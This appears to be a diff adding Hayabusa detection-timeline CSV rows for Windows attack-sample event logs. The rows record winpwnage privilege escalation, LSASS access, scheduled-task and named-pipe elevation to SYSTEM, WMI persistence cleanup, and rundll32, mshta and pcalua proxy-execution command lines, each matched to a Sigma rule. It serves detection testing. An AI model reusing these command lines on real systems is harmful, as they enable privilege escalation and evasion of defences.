+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx
+2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
